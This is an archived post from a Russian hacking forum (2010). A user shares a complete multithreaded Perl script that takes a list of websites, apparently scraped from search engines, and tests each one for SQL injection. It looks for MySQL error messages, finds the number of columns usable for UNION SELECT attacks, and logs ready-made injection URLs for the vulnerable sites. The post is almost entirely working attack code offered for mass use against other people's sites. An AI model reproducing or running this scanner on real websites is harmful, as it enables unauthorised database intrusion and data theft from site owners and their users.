Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Скрипт автоматизации поиска уязвимых сайтов

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Веб-программинг] >> Скрипт автоматизации поиска уязвимых сайтов
Имя
Сообщение << Старые топики   Новые топики >>
Скрипт автоматизации поиска уязвимых сайтов - 2010-02-05 13:12:41.340000   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
Всё, разобрался. Вообщем кому надо, вот скрипт проверяющий все урлы в текстовике на sql - инъекцию. Если сайт уязвим, скрипт узнает количество колонок.
Результат записывается в текстовик.
#!/usr/bin/perl -w ########################################## ##########Coded by Daniel_1024 ################# ########################################## use warnings; use threads; use threads::shared; use LWP::Simple; use LWP::UserAgent; use HTTP::Request; system(cls); print "Enter a file with targets:"; $file = &lt;STDIN&gt;; print "Enter output file:"; $vulnfile=&lt;STDIN&gt;; print "Enter number of threads:"; $tn=&lt;STDIN&gt;; open("FILE", $file) || die "Couldn't open file\n"; my @sites : shared =&lt;FILE&gt;; close("FILE"); chomp(@sites); my $num = 0; my @trl = undef; my $null = "09+and+1=" ; my $code = "0+union+select+" ; my $add = '+' ; my $com ='--'; print "Scan started\n"; for(0..$tn-1) {$trl[$_] = threads-&gt;create(\&test, $_);} for(@trl) { $_-&gt;join; } sub test { while(@sites){ { lock(@sites);} my $site = shift(@sites); my $i = 0; my $col = ''; my $specialword = ''; my $injection = $site.$null.$code."0",$com ; my $useragent = LWP::UserAgent-&gt;new(); $useragent-&gt;proxy("http", "http://$proxy/") if defined($proxy); my $response = $useragent-&gt;get($injection); my $result = $response-&gt;content; if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i ) { for ($i = 0 ; $i &lt; 35 ; $i ++) { $col.=','.$i; $specialword.=','."0x617a38387069783030713938"; if ($i == 0) { $specialword = '' ; $col = '' ; } $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ; $ua = LWP::UserAgent-&gt;new(); $ua-&gt;proxy("http", "http://$proxy/") if defined($proxy); $rq = $ua-&gt;get($sql); $response = $rq-&gt;content; if($response =~ /az88pix00q98/) { $i ++; print "\n[!] The Website $site Is Vulnerable\n" ; print "[!] It Have $i Columns\n" ; $sql=$site.$null.$code."0".$col.$com ; print "=&gt; ".$sql ."\n"; open(vuln_file,"&gt;&gt;$vulnfile"); print vuln_file "$sql\n"; close(vuln_file); } } } else { print "[!] The WebSite $site Is Not SQL Vulnerable !\n"; } } print "Scan finished"; print "[+] Saved to $vulnfile"; sleep 5; } Это очень облегчает работу при проверке отпарсенных с поисковиков сайтов.
Post #: 1
Страниц:  [1]
Все форумы >> [Веб-программинг] >> Скрипт автоматизации поиска уязвимых сайтов







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.